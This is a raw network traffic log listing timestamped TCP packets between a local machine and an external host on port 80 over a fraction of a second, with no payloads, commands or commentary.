Jul 12, 2021 10:28:46.200814962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200839996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200865030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200892925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.200901031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.200934887 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.201761007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.201792002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.201818943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.201831102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.201855898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.201879978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.201932907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202092886 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.202689886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202721119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202743053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202805042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.202855110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202877998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.202904940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.203720093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.203773022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.203799009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.203809977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.203854084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.203864098 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.203891039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.203938961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.204636097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.204766989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.204811096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.204828978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.204853058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.204904079 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.205391884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.205420971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.205444098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.205467939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.205486059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.205502987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.205518961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.206212997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.206285000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.206414938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.206453085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.206475019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.206497908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.206509113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.206552982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.207200050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.207377911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.207451105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.207464933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.207489014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.207539082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.207545996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.208177090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.208204985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.208234072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.208240986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.208265066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.208282948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.208317995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.208364964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.209063053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.209094048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.209144115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.209207058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.209232092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.209284067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.210108995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210143089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210163116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210186005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210207939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210226059 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.210279942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.210885048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210920095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210942030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.210962057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.210977077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211015940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.211040974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211087942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.211757898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211788893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211812019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211838007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.211855888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.211884975 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.211896896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212738037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212770939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212795019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212819099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.212833881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212851048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.212877035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.212927103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.213586092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.213787079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.213829041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.213862896 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.213893890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214220047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.214431047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214462042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214485884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214513063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214519978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.214544058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.214561939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.215306997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.215362072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.215385914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.215452909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.215468884 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.215475082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.215748072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.215810061 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.216305971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.216336012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.216356993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.216377020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.216422081 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.216471910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.216491938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217291117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217325926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217350006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217375040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.217392921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217406034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.217427015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.217487097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.218324900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.218452930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.218478918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.218508005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.218517065 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.218559980 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.219024897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219094992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219139099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219153881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.219257116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219284058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219307899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.219837904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219870090 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219892979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219916105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.219930887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.219964981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.219985008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.220037937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.220707893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.220932007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.220958948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.220980883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.220993042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.221036911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.221067905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.221754074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.221831083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.221888065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.221966982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222023964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.222054005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222176075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222230911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.222739935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222780943 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222804070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222824097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.222876072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.222887039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.223562956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.223598957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.223625898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.223650932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.223665953 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.223691940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.223707914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.224431992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.224462986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.224509954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.224539042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.224560976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.224581957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.224595070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.224664927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.225341082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.225373030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.225397110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.225419044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.225433111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.225481987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.225493908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226358891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226429939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226442099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.226465940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226577997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226603031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.226615906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.226661921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.227236032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.227266073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.227291107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.227335930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.227350950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.227413893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.227951050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.227979898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.228035927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.228070021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.228094101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.228116989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.228149891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.228879929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.228955030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.228975058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229048014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229104042 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.229129076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229155064 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229203939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.229918957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229965925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.229990005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230026007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.230052948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230076075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230107069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.230840921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230875015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230897903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230931044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.230942965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230967045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.230989933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.231054068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.231821060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.231858015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.231880903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.231904030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.231924057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.231952906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.232490063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.232633114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.232656002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.232677937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.232702017 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.232717037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.232728004 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.233458042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.233485937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.233525038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.233555079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.233604908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.233650923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.233671904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.233719110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.234352112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.234549999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.234582901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.234616041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.234627008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.234652042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.234663963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.235400915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.235480070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.235502005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.235553980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.235605955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.235663891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.235698938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.235750914 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.236277103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.236304998 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.236361027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.236376047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.236418009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.236473083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.236985922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237014055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237035990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237056971 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237104893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237112999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.237171888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.237966061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.237994909 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.238017082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.238044024 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.238068104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.238081932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.238099098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.238148928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.238888025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239025116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239053011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239077091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239097118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.239131927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239152908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.239886045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239912987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239969015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.239978075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.240000963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240020990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.240034103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240082026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.240855932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240886927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240911007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240928888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.240961075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.241022110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.241472006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.241498947 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.241556883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.241585016 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.241606951 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.241630077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.241657019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.242492914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.242547989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.242579937 CEST	49720	80	192.168.2.3	47.254.186.176
